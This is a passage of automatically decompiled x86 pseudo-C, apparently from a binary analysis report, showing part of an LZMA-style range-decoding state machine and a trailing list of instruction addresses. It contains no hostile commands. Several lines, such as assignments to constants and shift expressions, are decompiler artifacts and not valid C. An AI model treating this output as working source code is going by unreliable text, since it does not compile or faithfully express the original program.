                                                                      												while(1) {
                                                                      													L48:
                                                                      													__eflags = __ebx - 0x100;
                                                                      													if(__ebx >= 0x100) {
                                                                      														break;
                                                                      													}
                                                                      													__eax =  *(__ebp - 0x58);
                                                                      													__edx = __ebx + __ebx;
                                                                      													__ecx =  *(__ebp - 0x10);
                                                                      													__esi = __edx + __eax;
                                                                      													__ecx =  *(__ebp - 0x10) >> 0xb;
                                                                      													__ax =  *__esi;
                                                                      													 *(__ebp - 0x54) = __esi;
                                                                      													__edi = __ax & 0x0000ffff;
                                                                      													__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                                                      													__eflags =  *(__ebp - 0xc) - __ecx;
                                                                      													if( *(__ebp - 0xc) >= __ecx) {
                                                                      														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                                      														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                                      														__cx = __ax;
                                                                      														_t170 = __edx + 1; // 0x1
                                                                      														__ebx = _t170;
                                                                      														__cx = __ax >> 5;
                                                                      														__eflags = __eax;
                                                                      														 *__esi = __ax;
                                                                      													} else {
                                                                      														 *(__ebp - 0x10) = __ecx;
                                                                      														0x800 = 0x800 - __edi;
                                                                      														0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                                      														__ebx = __ebx + __ebx;
                                                                      														 *__esi = __cx;
                                                                      													}
                                                                      													__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                                      													 *(__ebp - 0x44) = __ebx;
                                                                      													if( *(__ebp - 0x10) >= 0x1000000) {
                                                                      														continue;
                                                                      													} else {
                                                                      														goto L46;
                                                                      													}
                                                                      												}
                                                                      												L54:
                                                                      												_t173 = __ebp - 0x34;
                                                                      												 *_t173 =  *(__ebp - 0x34) & 0x00000000;
                                                                      												__eflags =  *_t173;
                                                                      												goto L55;
                                                                      											case 0xf:
                                                                      												L58:
                                                                      												__eflags =  *(__ebp - 0x6c);
                                                                      												if( *(__ebp - 0x6c) == 0) {
                                                                      													 *(__ebp - 0x88) = 0xf;
                                                                      													goto L170;
                                                                      												}
                                                                      												__ecx =  *(__ebp - 0x70);
                                                                      												__eax =  *(__ebp - 0xc);
                                                                      												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                      												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                      												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                      												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                      												_t203 = __ebp - 0x70;
                                                                      												 *_t203 =  *(__ebp - 0x70) + 1;
                                                                      												__eflags =  *_t203;
                                                                      												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                      												L60:
                                                                      												__eflags = __ebx - 0x100;
                                                                      												if(__ebx >= 0x100) {
                                                                      													L55:
                                                                      													__al =  *(__ebp - 0x44);
                                                                      													 *(__ebp - 0x5c) =  *(__ebp - 0x44);
                                                                      													goto L56;
                                                                      												}
                                                                      												L61:
                                                                      												__eax =  *(__ebp - 0x58);
                                                                      												__edx = __ebx + __ebx;
                                                                      												__ecx =  *(__ebp - 0x10);
                                                                      												__esi = __edx + __eax;
                                                                      												__ecx =  *(__ebp - 0x10) >> 0xb;
                                                                      												__ax =  *__esi;
                                                                      												 *(__ebp - 0x54) = __esi;
                                                                      												__edi = __ax & 0x0000ffff;
                                                                      												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                                                      												__eflags =  *(__ebp - 0xc) - __ecx;
                                                                      												if( *(__ebp - 0xc) >= __ecx) {
                                                                      													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                                      													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                                      													__cx = __ax;
                                                                      													_t217 = __edx + 1; // 0x1
                                                                      													__ebx = _t217;
                                                                      													__cx = __ax >> 5;
                                                                      													__eflags = __eax;
                                                                      													 *__esi = __ax;
                                                                      												} else {
                                                                      													 *(__ebp - 0x10) = __ecx;
                                                                      													0x800 = 0x800 - __edi;
                                                                      													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                                      													__ebx = __ebx + __ebx;
                                                                      													 *__esi = __cx;
                                                                      												}
                                                                      												__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                                      												 *(__ebp - 0x44) = __ebx;
                                                                      												if( *(__ebp - 0x10) >= 0x1000000) {
                                                                      													goto L60;
                                                                      												} else {
                                                                      													goto L58;
                                                                      												}
                                                                      											case 0x10:
                                                                      												L109:
                                                                      												__eflags =  *(__ebp - 0x6c);
                                                                      												if( *(__ebp - 0x6c) == 0) {
                                                                      													 *(__ebp - 0x88) = 0x10;
                                                                      													goto L170;
                                                                      												}
                                                                      												__ecx =  *(__ebp - 0x70);
                                                                      												__eax =  *(__ebp - 0xc);
                                                                      												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                      												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                      												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                      												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                      												_t365 = __ebp - 0x70;
                                                                      												 *_t365 =  *(__ebp - 0x70) + 1;
                                                                      												__eflags =  *_t365;
                                                                      												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                      												goto L111;
                                                                      											case 0x11:
                                                                      												goto L69;
                                                                      											case 0x12:
                                                                      												__eflags =  *(__ebp - 0x40);
                                                                      												if( *(__ebp - 0x40) != 0) {
                                                                      													__eax =  *(__ebp - 0x58);
                                                                      													 *(__ebp - 0x84) = 0x13;
                                                                      													__esi =  *(__ebp - 0x58) + 2;
                                                                      													while(1) {
                                                                      														L132:
                                                                      														 *(_t613 - 0x54) = _t606;
                                                                      														goto L133;
                                                                      													}
                                                                      												}
                                                                      												__eax =  *(__ebp - 0x4c);
                                                                      												 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
                                                                      												__ecx =  *(__ebp - 0x58);
                                                                      												__eax =  *(__ebp - 0x4c) << 4;
                                                                      												__eflags = __eax;
                                                                      												__eax =  *(__ebp - 0x58) + __eax + 4;
                                                                      												goto L130;
                                                                      											case 0x13:
                                                                      												__eflags =  *(__ebp - 0x40);
                                                                      												if( *(__ebp - 0x40) != 0) {
                                                                      													_t469 = __ebp - 0x58;
                                                                      													 *_t469 =  *(__ebp - 0x58) + 0x204;
                                                                      													__eflags =  *_t469;
                                                                      													 *(__ebp - 0x30) = 0x10;
                                                                      													 *(__ebp - 0x40) = 8;
                                                                      													L144:
                                                                      													 *(__ebp - 0x7c) = 0x14;
                                                                      													goto L145;
                                                                      												}
                                                                      												__eax =  *(__ebp - 0x4c);
                                                                      												__ecx =  *(__ebp - 0x58);
                                                                      												__eax =  *(__ebp - 0x4c) << 4;
                                                                      												 *(__ebp - 0x30) = 8;
                                                                      												__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
                                                                      												L130:
                                                                      												 *(__ebp - 0x58) = __eax;
                                                                      												 *(__ebp - 0x40) = 3;
                                                                      												goto L144;
                                                                      											case 0x14:
                                                                      												 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
                                                                      												__eax =  *(__ebp - 0x80);
                                                                      												 *(_t613 - 0x88) = _t533;
                                                                      												goto L1;
                                                                      											case 0x15:
                                                                      												__eax = 0;
                                                                      												__eflags =  *(__ebp - 0x38) - 7;
                                                                      												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                                                                      												__al = __al & 0x000000fd;
                                                                      												__eax = (__eflags >= 0) - 1 + 0xb;
                                                                      												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
                                                                      												goto L120;
                                                                      											case 0x16:
                                                                      												__eax =  *(__ebp - 0x30);
                                                                      												__eflags = __eax - 4;
                                                                      												if(__eax >= 4) {
                                                                      													_push(3);
                                                                      													_pop(__eax);
                                                                      												}
                                                                      												__ecx =  *(__ebp - 4);
                                                                      												 *(__ebp - 0x40) = 6;
                                                                      												__eax = __eax << 7;
                                                                      												 *(__ebp - 0x7c) = 0x19;
                                                                      												 *(__ebp - 0x58) = __eax;
                                                                      												goto L145;
                                                                      											case 0x17:
                                                                      												L145:
                                                                      												__eax =  *(__ebp - 0x40);
                                                                      												 *(__ebp - 0x50) = 1;
                                                                      												 *(__ebp - 0x48) =  *(__ebp - 0x40);
                                                                      												goto L149;
                                                                      											case 0x18:
                                                                      												L146:
                                                                      												__eflags =  *(__ebp - 0x6c);
                                                                      												if( *(__ebp - 0x6c) == 0) {
                                                                      													 *(__ebp - 0x88) = 0x18;
                                                                      													goto L170;
                                                                      												}
                                                                      												__ecx =  *(__ebp - 0x70);
                                                                      												__eax =  *(__ebp - 0xc);
                                                                      												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                      												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                      												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                      												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                      												_t484 = __ebp - 0x70;
                                                                      												 *_t484 =  *(__ebp - 0x70) + 1;
                                                                      												__eflags =  *_t484;
                                                                      												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                      												L148:
                                                                      												_t487 = __ebp - 0x48;
                                                                      												 *_t487 =  *(__ebp - 0x48) - 1;
                                                                      												__eflags =  *_t487;
                                                                      												L149:
                                                                      												__eflags =  *(__ebp - 0x48);
                                                                      												if( *(__ebp - 0x48) <= 0) {
                                                                      													__ecx =  *(__ebp - 0x40);
                                                                      													__ebx =  *(__ebp - 0x50);
                                                                      													0 = 1;
                                                                      													__eax = 1 << __cl;
                                                                      													__ebx =  *(__ebp - 0x50) - (1 << __cl);
                                                                      													__eax =  *(__ebp - 0x7c);
                                                                      													 *(__ebp - 0x44) = __ebx;
                                                                      													while(1) {
                                                                      														 *(_t613 - 0x88) = _t533;
                                                                      														goto L1;
                                                                      													}
                                                                      												}
                                                                      												__eax =  *(__ebp - 0x50);
                                                                      												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                                                      												__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
                                                                      												__eax =  *(__ebp - 0x58);
                                                                      												__esi = __edx + __eax;
                                                                      												 *(__ebp - 0x54) = __esi;
                                                                      												__ax =  *__esi;
                                                                      												__edi = __ax & 0x0000ffff;
                                                                      												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                                                      												__eflags =  *(__ebp - 0xc) - __ecx;
                                                                      												if( *(__ebp - 0xc) >= __ecx) {
                                                                      													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                                      													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                                      													__cx = __ax;
                                                                      													__cx = __ax >> 5;
                                                                      													__eax = __eax - __ecx;
                                                                      													__edx = __edx + 1;
                                                                      													__eflags = __edx;
                                                                      													 *__esi = __ax;
                                                                      													 *(__ebp - 0x50) = __edx;
                                                                      												} else {
                                                                      													 *(__ebp - 0x10) = __ecx;
                                                                      													0x800 = 0x800 - __edi;
                                                                      													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                                      													 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
                                                                      													 *__esi = __cx;
                                                                      												}
                                                                      												__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                                      												if( *(__ebp - 0x10) >= 0x1000000) {
                                                                      													goto L148;
                                                                      												} else {
                                                                      													goto L146;
                                                                      												}
                                                                      											case 0x19:
                                                                      												__eflags = __ebx - 4;
                                                                      												if(__ebx < 4) {
                                                                      													 *(__ebp - 0x2c) = __ebx;
                                                                      													L119:
                                                                      													_t393 = __ebp - 0x2c;
                                                                      													 *_t393 =  *(__ebp - 0x2c) + 1;
                                                                      													__eflags =  *_t393;
                                                                      													L120:
                                                                      													__eax =  *(__ebp - 0x2c);
                                                                      													__eflags = __eax;
                                                                      													if(__eax == 0) {
                                                                      														 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
                                                                      														goto L170;
                                                                      													}
                                                                      													__eflags = __eax -  *(__ebp - 0x60);
                                                                      													if(__eax >  *(__ebp - 0x60)) {
                                                                      														goto L171;
                                                                      													}
                                                                      													 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
                                                                      													__eax =  *(__ebp - 0x30);
                                                                      													_t400 = __ebp - 0x60;
                                                                      													 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
                                                                      													__eflags =  *_t400;
                                                                      													goto L123;
                                                                      												}
                                                                      												__ecx = __ebx;
                                                                      												__eax = __ebx;
                                                                      												__ecx = __ebx >> 1;
                                                                      												__eax = __ebx & 0x00000001;
                                                                      												__ecx = (__ebx >> 1) - 1;
                                                                      												__al = __al | 0x00000002;
                                                                      												__eax = (__ebx & 0x00000001) << __cl;
                                                                      												__eflags = __ebx - 0xe;
                                                                      												 *(__ebp - 0x2c) = __eax;
                                                                      												if(__ebx >= 0xe) {
                                                                      													__ebx = 0;
                                                                      													 *(__ebp - 0x48) = __ecx;
                                                                      													L102:
                                                                      													__eflags =  *(__ebp - 0x48);
                                                                      													if( *(__ebp - 0x48) <= 0) {
                                                                      														__eax = __eax + __ebx;
                                                                      														 *(__ebp - 0x40) = 4;
                                                                      														 *(__ebp - 0x2c) = __eax;
                                                                      														__eax =  *(__ebp - 4);
                                                                      														__eax =  *(__ebp - 4) + 0x644;
                                                                      														__eflags = __eax;
                                                                      														L108:
                                                                      														__ebx = 0;
                                                                      														 *(__ebp - 0x58) = __eax;
                                                                      														 *(__ebp - 0x50) = 1;
                                                                      														 *(__ebp - 0x44) = 0;
                                                                      														 *(__ebp - 0x48) = 0;
                                                                      														L112:
                                                                      														__eax =  *(__ebp - 0x40);
                                                                      														__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
                                                                      														if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
                                                                      															_t391 = __ebp - 0x2c;
                                                                      															 *_t391 =  *(__ebp - 0x2c) + __ebx;
                                                                      															__eflags =  *_t391;
                                                                      															goto L119;
                                                                      														}
                                                                      														__eax =  *(__ebp - 0x50);
                                                                      														 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                                                      														__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
                                                                      														__eax =  *(__ebp - 0x58);
                                                                      														__esi = __edi + __eax;
                                                                      														 *(__ebp - 0x54) = __esi;
                                                                      														__ax =  *__esi;
                                                                      														__ecx = __ax & 0x0000ffff;
                                                                      														__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
                                                                      														__eflags =  *(__ebp - 0xc) - __edx;
                                                                      														if( *(__ebp - 0xc) >= __edx) {
                                                                      															__ecx = 0;
                                                                      															 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
                                                                      															__ecx = 1;
                                                                      															 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
                                                                      															__ebx = 1;
                                                                      															__ecx =  *(__ebp - 0x48);
                                                                      															__ebx = 1 << __cl;
                                                                      															__ecx = 1 << __cl;
                                                                      															__ebx =  *(__ebp - 0x44);
                                                                      															__ebx =  *(__ebp - 0x44) | __ecx;
                                                                      															__cx = __ax;
                                                                      															__cx = __ax >> 5;
                                                                      															__eax = __eax - __ecx;
                                                                      															__edi = __edi + 1;
                                                                      															__eflags = __edi;
                                                                      															 *(__ebp - 0x44) = __ebx;
                                                                      															 *__esi = __ax;
                                                                      															 *(__ebp - 0x50) = __edi;
                                                                      														} else {
                                                                      															 *(__ebp - 0x10) = __edx;
                                                                      															0x800 = 0x800 - __ecx;
                                                                      															0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
                                                                      															 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
                                                                      															 *__esi = __dx;
                                                                      														}
                                                                      														__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                                      														if( *(__ebp - 0x10) >= 0x1000000) {
                                                                      															L111:
                                                                      															_t368 = __ebp - 0x48;
                                                                      															 *_t368 =  *(__ebp - 0x48) + 1;
                                                                      															__eflags =  *_t368;
                                                                      															goto L112;
                                                                      														} else {
                                                                      															goto L109;
                                                                      														}
                                                                      													}
                                                                      													__ecx =  *(__ebp - 0xc);
                                                                      													__ebx = __ebx + __ebx;
                                                                      													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
                                                                      													__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
                                                                      													 *(__ebp - 0x44) = __ebx;
                                                                      													if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
                                                                      														__ecx =  *(__ebp - 0x10);
                                                                      														 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
                                                                      														__ebx = __ebx | 0x00000001;
                                                                      														__eflags = __ebx;
                                                                      														 *(__ebp - 0x44) = __ebx;
                                                                      													}
                                                                      													__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                                      													if( *(__ebp - 0x10) >= 0x1000000) {
                                                                      														L101:
                                                                      														_t338 = __ebp - 0x48;
                                                                      														 *_t338 =  *(__ebp - 0x48) - 1;
                                                                      														__eflags =  *_t338;
                                                                      														goto L102;
                                                                      													} else {
                                                                      														goto L99;
                                                                      													}
                                                                      												}
                                                                      												__edx =  *(__ebp - 4);
                                                                      												__eax = __eax - __ebx;
                                                                      												 *(__ebp - 0x40) = __ecx;
                                                                      												__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
                                                                      												goto L108;
                                                                      											case 0x1a:
                                                                      												L56:
                                                                      												__eflags =  *(__ebp - 0x64);
                                                                      												if( *(__ebp - 0x64) == 0) {
                                                                      													 *(__ebp - 0x88) = 0x1a;
                                                                      													goto L170;
                                                                      												}
                                                                      												__ecx =  *(__ebp - 0x68);
                                                                      												__al =  *(__ebp - 0x5c);
                                                                      												__edx =  *(__ebp - 8);
                                                                      												 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
                                                                      												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                                                                      												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
                                                                      												 *( *(__ebp - 0x68)) = __al;
                                                                      												__ecx =  *(__ebp - 0x14);
                                                                      												 *(__ecx +  *(__ebp - 8)) = __al;
                                                                      												__eax = __ecx + 1;
                                                                      												__edx = 0;
                                                                      												_t192 = __eax %  *(__ebp - 0x74);
                                                                      												__eax = __eax /  *(__ebp - 0x74);
                                                                      												__edx = _t192;
                                                                      												goto L80;
                                                                      											case 0x1b:
                                                                      												L76:
                                                                      												__eflags =  *(__ebp - 0x64);
                                                                      												if( *(__ebp - 0x64) == 0) {
                                                                      													 *(__ebp - 0x88) = 0x1b;
                                                                      													goto L170;
                                                                      												}
                                                                      												__eax =  *(__ebp - 0x14);
                                                                      												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                                                      												__eflags = __eax -  *(__ebp - 0x74);
                                                                      												if(__eax >=  *(__ebp - 0x74)) {
                                                                      													__eax = __eax +  *(__ebp - 0x74);
                                                                      													__eflags = __eax;
                                                                      												}
                                                                      												__edx =  *(__ebp - 8);
                                                                      												__cl =  *(__eax + __edx);
                                                                      												__eax =  *(__ebp - 0x14);
                                                                      												 *(__ebp - 0x5c) = __cl;
                                                                      												 *(__eax + __edx) = __cl;
                                                                      												__eax = __eax + 1;
                                                                      												__edx = 0;
                                                                      												_t275 = __eax %  *(__ebp - 0x74);
                                                                      												__eax = __eax /  *(__ebp - 0x74);
                                                                      												__edx = _t275;
                                                                      												__eax =  *(__ebp - 0x68);
                                                                      												 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
                                                                      												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                                                                      												_t284 = __ebp - 0x64;
                                                                      												 *_t284 =  *(__ebp - 0x64) - 1;
                                                                      												__eflags =  *_t284;
                                                                      												 *( *(__ebp - 0x68)) = __cl;
                                                                      												L80:
                                                                      												 *(__ebp - 0x14) = __edx;
                                                                      												goto L81;
                                                                      											case 0x1c:
                                                                      												while(1) {
                                                                      													L123:
                                                                      													__eflags =  *(__ebp - 0x64);
                                                                      													if( *(__ebp - 0x64) == 0) {
                                                                      														break;
                                                                      													}
                                                                      													__eax =  *(__ebp - 0x14);
                                                                      													__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                                                      													__eflags = __eax -  *(__ebp - 0x74);
                                                                      													if(__eax >=  *(__ebp - 0x74)) {
                                                                      														__eax = __eax +  *(__ebp - 0x74);
                                                                      														__eflags = __eax;
                                                                      													}
                                                                      													__edx =  *(__ebp - 8);
                                                                      													__cl =  *(__eax + __edx);
                                                                      													__eax =  *(__ebp - 0x14);
                                                                      													 *(__ebp - 0x5c) = __cl;
                                                                      													 *(__eax + __edx) = __cl;
                                                                      													__eax = __eax + 1;
                                                                      													__edx = 0;
                                                                      													_t414 = __eax %  *(__ebp - 0x74);
                                                                      													__eax = __eax /  *(__ebp - 0x74);
                                                                      													__edx = _t414;
                                                                      													__eax =  *(__ebp - 0x68);
                                                                      													 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                                                                      													 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
                                                                      													 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
                                                                      													__eflags =  *(__ebp - 0x30);
                                                                      													 *( *(__ebp - 0x68)) = __cl;
                                                                      													 *(__ebp - 0x14) = _t414;
                                                                      													if( *(__ebp - 0x30) > 0) {
                                                                      														continue;
                                                                      													} else {
                                                                      														L81:
                                                                      														 *(__ebp - 0x88) = 2;
                                                                      														goto L1;
                                                                      													}
                                                                      												}
                                                                      												 *(__ebp - 0x88) = 0x1c;
                                                                      												goto L170;
                                                                      										}
                                                                      									}
                                                                      									L171:
                                                                      									_t535 = _t534 | 0xffffffff;
                                                                      									goto L172;
                                                                      								}
                                                                      							}
                                                                      						}
                                                                      					}
                                                                      					goto L1;
                                                                      				}
                                                                      			}













                                                                      0x00000000
                                                                      0x00406e77
                                                                      0x00406e77
                                                                      0x00406e7b
                                                                      0x00406e88
                                                                      0x00406e92
                                                                      0x00000000
                                                                      0x00406e7d
                                                                      0x00406e7d
                                                                      0x00406eb8
                                                                      0x00406ebb
                                                                      0x00406ebe
                                                                      0x00406ec1
                                                                      0x00406ec1
                                                                      0x00406ec4
                                                                      0x00406ecb
                                                                      0x00406ed0
                                                                      0x00406db1
                                                                      0x00406db4
                                                                      0x00407126
                                                                      0x00407126
                                                                      0x00407126
                                                                      0x00407129
                                                                      0x00407129
                                                                      0x00407129
                                                                      0x0040712f
                                                                      0x00407135
                                                                      0x0040713b
                                                                      0x00407155
                                                                      0x00407158
                                                                      0x0040715e
                                                                      0x00407169
                                                                      0x0040716b
                                                                      0x0040713d
                                                                      0x0040713d
                                                                      0x0040714c
                                                                      0x00407150
                                                                      0x00407150
                                                                      0x00407175
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00407177
                                                                      0x0040717b
                                                                      0x0040732a
                                                                      0x00407340
                                                                      0x00407348
                                                                      0x0040734f
                                                                      0x00407351
                                                                      0x00407358
                                                                      0x0040735c
                                                                      0x0040735c
                                                                      0x00407187
                                                                      0x0040718e
                                                                      0x00407196
                                                                      0x00407199
                                                                      0x0040719c
                                                                      0x0040719c
                                                                      0x004071a2
                                                                      0x004071a2
                                                                      0x0040693e
                                                                      0x0040693e
                                                                      0x0040693e
                                                                      0x00406947
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x0040694d
                                                                      0x00000000
                                                                      0x00406958
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00406961
                                                                      0x00406964
                                                                      0x00406967
                                                                      0x0040696b
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00406971
                                                                      0x00406974
                                                                      0x00406976
                                                                      0x00406977
                                                                      0x0040697a
                                                                      0x0040697c
                                                                      0x0040697d
                                                                      0x0040697f
                                                                      0x00406982
                                                                      0x00406987
                                                                      0x0040698c
                                                                      0x00406995
                                                                      0x004069a8
                                                                      0x004069ab
                                                                      0x004069b7
                                                                      0x004069df
                                                                      0x004069e1
                                                                      0x004069ef
                                                                      0x004069ef
                                                                      0x004069f3
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x004069e3
                                                                      0x004069e3
                                                                      0x004069e6
                                                                      0x004069e7
                                                                      0x004069e7
                                                                      0x00000000
                                                                      0x004069e3
                                                                      0x004069bd
                                                                      0x004069c2
                                                                      0x004069c2
                                                                      0x004069cb
                                                                      0x004069d3
                                                                      0x004069d6
                                                                      0x00000000
                                                                      0x004069dc
                                                                      0x004069dc
                                                                      0x00000000
                                                                      0x004069dc
                                                                      0x00000000
                                                                      0x004069f9
                                                                      0x004069f9
                                                                      0x004069fd
                                                                      0x004072a9
                                                                      0x00000000
                                                                      0x004072a9
                                                                      0x00406a06
                                                                      0x00406a16
                                                                      0x00406a19
                                                                      0x00406a1c
                                                                      0x00406a1c
                                                                      0x00406a1c
                                                                      0x00406a1f
                                                                      0x00406a23
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00406a25
                                                                      0x00406a2b
                                                                      0x00406a55
                                                                      0x00406a5b
                                                                      0x00406a62
                                                                      0x00000000
                                                                      0x00406a62
                                                                      0x00406a31
                                                                      0x00406a34
                                                                      0x00406a39
                                                                      0x00406a39
                                                                      0x00406a44
                                                                      0x00406a4c
                                                                      0x00406a4f
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00406a94
                                                                      0x00406a9a
                                                                      0x00406a9d
                                                                      0x00406aaa
                                                                      0x00406ab2
                                                                      0x00407126
                                                                      0x00407126
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00406a69
                                                                      0x00406a69
                                                                      0x00406a6d
                                                                      0x004072b8
                                                                      0x00000000
                                                                      0x004072b8
                                                                      0x00406a79
                                                                      0x00406a84
                                                                      0x00406a84
                                                                      0x00406a84
                                                                      0x00406a87
                                                                      0x00406a8a
                                                                      0x00406a8d
                                                                      0x00406a92
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00407129
                                                                      0x00407129
                                                                      0x0040712f
                                                                      0x00407135
                                                                      0x0040713b
                                                                      0x00407155
                                                                      0x00407158
                                                                      0x0040715e
                                                                      0x00407169
                                                                      0x0040716b
                                                                      0x0040713d
                                                                      0x0040713d
                                                                      0x0040714c
                                                                      0x00407150
                                                                      0x00407150
                                                                      0x00407175
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00406aba
                                                                      0x00406abc
                                                                      0x00406abf
                                                                      0x00406b30
                                                                      0x00406b33
                                                                      0x00406b36
                                                                      0x00406b3d
                                                                      0x00406b47
                                                                      0x00407126
                                                                      0x00407126
                                                                      0x00407126
                                                                      0x00000000
                                                                      0x00407126
                                                                      0x00407126
                                                                      0x00406ac1
                                                                      0x00406ac5
                                                                      0x00406ac8
                                                                      0x00406aca
                                                                      0x00406acd
                                                                      0x00406ad0
                                                                      0x00406ad2
                                                                      0x00406ad5
                                                                      0x00406ad7
                                                                      0x00406adc
                                                                      0x00406adf
                                                                      0x00406ae2
                                                                      0x00406ae6
                                                                      0x00406aed
                                                                      0x00406af0
                                                                      0x00406af7
                                                                      0x00406afb
                                                                      0x00406b03
                                                                      0x00406b03
                                                                      0x00406b03
                                                                      0x00406afd
                                                                      0x00406afd
                                                                      0x00406afd
                                                                      0x00406af2
                                                                      0x00406af2
                                                                      0x00406af2
                                                                      0x00406b07
                                                                      0x00406b0a
                                                                      0x00406b28
                                                                      0x00406b2a
                                                                      0x00000000
                                                                      0x00406b0c
                                                                      0x00406b0c
                                                                      0x00406b0f
                                                                      0x00406b12
                                                                      0x00406b15
                                                                      0x00406b17
                                                                      0x00406b17
                                                                      0x00406b17
                                                                      0x00406b1a
                                                                      0x00406b1d
                                                                      0x00406b1f
                                                                      0x00406b20
                                                                      0x00406b23
                                                                      0x00000000
                                                                      0x00406b23
                                                                      0x00000000
                                                                      0x00406d59
                                                                      0x00406d5d
                                                                      0x00406d7b
                                                                      0x00406d7e
                                                                      0x00406d85
                                                                      0x00406d88
                                                                      0x00406d8b
                                                                      0x00406d8e
                                                                      0x00406d91
                                                                      0x00406d94
                                                                      0x00406d96
                                                                      0x00406d9d
                                                                      0x00406d9e
                                                                      0x00406da0
                                                                      0x00406da3
                                                                      0x00406da6
                                                                      0x00406da9
                                                                      0x00406da9
                                                                      0x00406dae
                                                                      0x00000000
                                                                      0x00406dae
                                                                      0x00406d5f
                                                                      0x00406d62
                                                                      0x00406d65
                                                                      0x00406d6f
                                                                      0x00407126
                                                                      0x00407126
                                                                      0x00407126
                                                                      0x00000000
                                                                      0x00407126
                                                                      0x00000000
                                                                      0x00406dc3
                                                                      0x00406dc7
                                                                      0x00406dea
                                                                      0x00406ded
                                                                      0x00406df0
                                                                      0x00406dfa
                                                                      0x00406dc9
                                                                      0x00406dc9
                                                                      0x00406dcc
                                                                      0x00406dcf
                                                                      0x00406dd2
                                                                      0x00406ddf
                                                                      0x00406de2
